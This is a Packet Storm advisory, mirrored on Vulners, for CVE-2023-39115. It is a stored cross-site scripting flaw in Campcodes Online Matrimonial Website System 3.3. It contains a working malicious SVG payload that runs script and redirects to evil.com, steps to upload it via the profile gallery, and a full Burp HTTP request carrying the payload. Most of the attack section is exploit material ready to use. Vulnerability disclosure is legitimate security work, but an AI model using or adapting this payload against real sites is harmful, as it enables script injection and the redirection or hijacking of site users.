Lucene search
+L

Campcodes Online Matrimonial Website System 3.3 Cross Site Scripting

🗓️ 04 Aug 2023 00:00:00Reported by Rajdip Dey SarkarType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 184 Views

Vulnerability in Campcodes Online Matrimonial Website System v3.3 allows arbitrary code execution via SVG file uploa

Related
Code
`#########################################################################################################################################  
# Exploit Title: Vulnerability in Campcodes Online Matrimonial Website  
System v3.3 allows code execution via malicious SVG file upload  
# Date: 3-8-2023  
# Vendor Homepage: http://campcodes.com  
# Category: Web Application  
# Exploit Author: Rajdip Dey Sarkar  
# Version: 3.3  
# Tested on: Windows/Kali  
# CVE: CVE-2023-39115  
###########################################################################################################################################  
  
  
  
Description:  
----------------  
  
An arbitrary file upload vulnerability in Campcodes Online Matrimonial  
Website System Script v3.3 allows attackers to execute arbitrary code via  
uploading a crafted SVG file.  
  
  
SVG Payload  
------------------  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert("You have been hacked!!")  
  
  
window.location.href="https://evil.com"  
</script>  
</svg>  
  
  
Steps to reproduce  
--------------------------  
  
-Login with your creds  
-Navigate to this directory - /profile-settings  
-Click on Gallery -> Add New Image -> Browser -> Add Files  
-Choose the SVG file and upload done  
-Click the image!! Payload Triggered  
  
  
Burp Request  
-------------------  
  
POST /Matrimonial%20Script/install/aiz-uploader/upload HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)  
Gecko/20100101 Firefox/115.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-CSRF-TOKEN: I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Content-Type: multipart/form-data;  
boundary=---------------------------167707198418121100152548123485  
Content-Length: 1044  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/Matrimonial%20Script/install/gallery-image/create  
Cookie: _session=5GnMKaOhppEZivuzZJFXQLdldLMXecD1hmcEPWjg;  
acceptCookies=true; XSRF-TOKEN=I5gqfipOOKWwI74hfdtFC2kpUP0EggWb8Qf7Xd5E  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="relativePath"  
  
null  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="name"  
  
file (1).svg  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="type"  
  
image/svg+xml  
-----------------------------167707198418121100152548123485  
Content-Disposition: form-data; name="aiz_file"; filename="file (1).svg"  
Content-Type: image/svg+xml  
  
<?xml version="1.0" standalone="no"?>  
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "  
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">  
  
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">  
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"  
stroke="#004400"/>  
<script type="text/javascript">  
alert("You have been hacked!!")  
  
  
window.location.href="https://evil.com"  
</script>  
</svg>  
-----------------------------167707198418121100152548123485--  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation